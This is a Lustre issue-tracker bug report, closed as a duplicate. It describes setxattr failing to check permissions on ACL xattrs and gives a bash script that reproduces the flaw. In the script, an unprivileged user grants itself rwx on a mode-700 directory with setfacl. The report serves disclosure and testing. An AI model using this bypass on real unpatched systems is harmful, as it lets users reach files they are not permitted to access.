Loading...

XML

Word

Printable

Details

Type: Bug
Resolution: Duplicate
Priority: Blocker
Fix Version/s: Lustre 2.6.0, Lustre 2.5.1, Lustre 2.4.3
Affects Version/s: Lustre 2.6.0
Labels:
- patch

Severity:
3
Rank (Obsolete):
12939

Description

Setxattr does not check the permission when setting ACL xattrs. This
will cause security problem because any user can walk around permission
checking by changing ACL rules.

Following script will reproduce this problem.
#!/bin/bash
DIR=/mnt/lustre/dir

we can got this from Lustre/test
RUNAS=./runas
rmdir $DIR
if [ -e $DIR ]; then
echo "Please remove $DIR"
exit 1
fi

mkdir $DIR
if [ ! -d $DIR ]; then
echo "Faled to mkdir $DIR"
exit 1
fi

chmod 700 $DIR

$RUNAS -u test ls $DIR
if [ $? -eq 0 ]; then
echo "Permission error"
exit 1
fi

$RUNAS -u test setfacl -m u:test:rwx $DIR
if [ $? -ne 0 ]; then
echo "Probelm not reproduced because setfacl failed"
exit 1
fi

echo "Probelm reproduced!!"

$RUNAS -u test ls $DIR
if [ $? -ne 0 ]; then
echo "ACL does not work!"
exit 1
fi

echo "Security problem!!"

Attachments

Issue Links

duplicates

LU-4703 setxattr(2) will succeed by a non root user, against a file the user doesn't own.

Resolved

is related to

LU-4703 setxattr(2) will succeed by a non root user, against a file the user doesn't own.

Resolved

Activity

People

Assignee:: Emoly Liu

Reporter:: Li Xi (Inactive)

Votes:: 0 Vote for this issue

Watchers:: 13 Start watching this issue

Dates

Created:: 04/Mar/14 8:54 AM

Updated:: 30/May/14 2:52 PM

Resolved:: 05/Mar/14 6:33 PM